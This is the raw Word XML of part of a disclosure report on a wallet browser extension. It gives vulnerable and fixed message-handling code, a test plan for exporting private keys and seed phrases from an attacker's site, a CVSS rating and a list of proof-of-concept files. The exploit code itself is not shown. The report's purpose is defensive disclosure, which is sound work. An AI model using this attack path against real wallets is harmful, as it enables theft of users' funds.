    </w:p>
    <w:p w14:paraId="464E22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(evnt.source !== window || !evnt.data) return;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Insufficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81C4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(evnt.data.type === "VW_REQ") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E5B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Process message...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F73D2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18F1AB0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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C00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FIXED CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF416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typescript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD90D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window.addEventListener("message", async function handler(evnt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B7D2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1.1: Validate origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDE9B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trustedOrigins = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CA89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"https://app.verified.network",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C73D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"https://verified.network",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286591F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"https://dashboard.verified.network"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CAE4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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6D0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601A0CF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(!trustedOrigins.includes(evnt.origin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FEC5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console.error(`[SECURITY] Rejected message from untrusted origin: ${evnt.origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9CD0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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC153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72576A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1E9F6F3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1.2: Still check source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579D88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(evnt.source !== window || !evnt.data) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75C86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57960B2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(evnt.data.type === "VW_REQ") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237D5E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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// ... rest of handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315D1D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1720E80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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472E94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 2: Restrict Message Broadcasting (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B34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scripts/content.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Line: 22987</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D2ED2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CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E00D3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5267C4F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window.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCAE7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type: "VW_RES",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE10E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params: res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B49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}, "*");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Broadcasts to ALL origins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61AC0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FIXED CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D120B9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3852B7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Only send to same origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D22E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window.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242215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type: "VW_RES",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06ADE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params: res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A247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}, window.location.origin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466209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 3: Add User Confirmation for Sensitive Operations (REQUIRED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFCB9C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scripts/background.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Line: 5386+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671378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VULNERABLE CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D181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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64419AC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chrome.runtime.onMessage.addListener((req, _, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB59C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❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> No user confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110C5F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result = this.custody.exportPrivateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87934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res({ success: true, data: result });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A29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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80D5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FIXED CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BF7E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typescript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02816C9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chrome.runtime.onMessage.addListener(async (req, sender, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F043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3.1: Define sensitive operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C1906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sensitiveOps = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD381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"exportPrivateKey",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED126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"exportSeedPhrase",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E71F9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"signTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B352D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"sendTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E1FC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"changePassword",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C950F8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"resetAccount"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D823EE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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B51ED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776C9A3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3.2: Require user confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64D26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(sensitiveOps.includes(req.params?.method)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E76EB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confirmed = await this.showConfirmationDialog({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390158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title: "Confirm Sensitive Operation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997108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message: `Allow this site to ${req.params.method}?`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362944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details: JSON.stringify(req.params, null, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFB50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timeout: 60000  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// 1 minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C306E5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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906AEB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40688C1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(!confirmed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3861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res({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB95C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success: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E4F2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  error: "User rejected operation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086EA2A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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17625EE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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE740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781732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2D0BD3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39B76E1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3.3: Process operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0879F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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C0FB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const result = await this.processRequest(req);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033932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res({ success: true, data: result });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2324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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A700DF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res({ success: false, error: error.message });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D552D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4DD8CBB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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C06D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Fix 4: Parameter Validation (RECOMMENDED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E69E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File: scripts/content.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E08A1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ADDED CODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DAA4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typescript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919780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function validateRequestParameters(params: any): boolean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E540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4.1: Whitelist allowed methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B3057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const allowedMethods = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCA6D9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"getAccounts",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DB40F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"signMessage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57973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"signTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5143B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"switchChain",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0A85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"pair_walletconnect_uri"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4067D78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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC4CE9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1B35F0D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(!allowedMethods.includes(params.method)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6613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console.error(`[SECURITY] Blocked unknown method: ${params.method}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10487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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB92BE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33D58CD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2287F03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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX 4.2: Validate transaction parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418247B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if (params.method === "signTransaction") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C78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(!params.transaction?.to) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D822C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console.error("[SECURITY] Missing recipient address");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA57D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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C904D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52CB59E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if (!params.transaction?.value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4432B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console.error("[SECURITY] Missing transaction value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A0A0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  return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E401BF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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7EAA9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3262B84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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10450ED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 xml:space="preserve">  return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457B9D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480E4C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5330A38F">
          <v:rect id="_x0000_i1242" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5ED0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TESTING &amp; VERIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF20E1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Test Plan</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100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3108"/>
        <w:gridCol w:w="2965"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="75A24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444B5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C82E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Expected Result (Vulnerable)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5FB9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Expected Result (Fixed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="3D7F57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38CBFD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Export private key from attacker.com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6A79E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Returns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911DE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Blocks request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="31C1FC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45727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Sign transaction from attacker.com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046F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Signature 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E41E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User confirmation required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="7D8B20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8EC3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Export seed phrase from attacker.com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AD67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Returns phrase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18C96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Blocks request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="517F8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1399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postMessage with wildcard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BACD89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Broadcasts to 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BFAC1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Restricted to same origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="032606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4BD074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Missing origin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88C7A2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Processes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F755B" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C91A8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rejects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64CC23BD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Verification Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684083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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C0EC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1. Run Node.js PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510D3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npx ts-node exploit-poc.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F2CE4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Should show: [VULNERABLE] Received exportPrivateKey from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9F341" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6825E8F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2. Open exploit.html in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116647B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Should show: Wallet Response Received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD9C2A6" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0D1042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3. After applying fixes, re-run tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C355F0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# Should show: [BLOCKED] Untrusted origin rejected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CAD4C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0BFF8755">
          <v:rect id="_x0000_i1243" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE11758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CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4989E5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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C0B0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The Verified Wallet extension v1.1.1 contains a CRITICAL vulnerability that allows complete compromise of user custody accounts through cross-origin message injection. The vulnerability is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F0618" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Easy to exploit - Any website can trigger the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119B3BD" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High-impact - Results in complete fund theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32113E84" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Undetected - Users have no way to know their keys are compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A981429" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reversible - Blockchain transactions cannot be undone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A4A4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Severity Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18114AE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lastRenderedPageBreak/>
        <w:t>CVSS 9.5 = CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A738570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This vulnerability meets the definition of critical because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD30DC0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Network exploitable (no special access needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C36673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Low complexity attack (standard web technologies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E329B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No privileges required (works with any user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53281C47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No user interaction needed (automatic exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1C3EF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High confidentiality impact (private keys exposed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E567021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High integrity impact (unauthorized transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151886B2" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Scope changed (affects custody system beyond extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F412EF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Recommended Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76874478" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IMMEDIATE: Disable v1.1.1 from Chrome Web Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5AB424" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URGENT: Apply all fixes and conduct security audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BDAF5B" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SHORT-TERM: Release patched version (v1.1.2+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD0D93" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MEDIUM-TERM: Full security review of message passing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FEA03D" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LONG-TERM: Security testing in CI/CD pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085603DA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Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE84CE" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discovery: December 13, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199BF09" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vendor Notification: [Expected within 24 hours]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02427AD7" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patch Expected: 14 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F30EB" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Public Disclosure: 90 days after patch availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4902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64F78E4F">
          <v:rect id="_x0000_i1244" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B258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APPENDIX: PoC Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB5B19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Three complete, working proof-of-concept files are provided:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2AA9E" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit-poc.ts - TypeScript exploitation demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE855C1" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit.html - Browser-based exploitation page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E853C" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test-runner.sh - Automated test suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA2A83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All files are ready to run and demonstrate the vulnerability conclusively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFDA3A6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pict w14:anchorId="081B6304">
          <v:rect id="_x0000_i1245" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C231E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</w:rPr>
        <w:t>END OF REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C3401" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This report is submitted in accordance with responsible disclosure principles. All information is confidential until vendor patch availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC7224" w14:textId="77777777" w:rsidR="006909D9" w:rsidRPr="00C91A8C" w:rsidRDefault="006909D9" w:rsidP="00C91A8C"/>
    <w:sectPr w:rsidR="006909D9" w:rsidRPr="00C9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836"/>
    <w:multiLevelType w:val="multilevel"/>
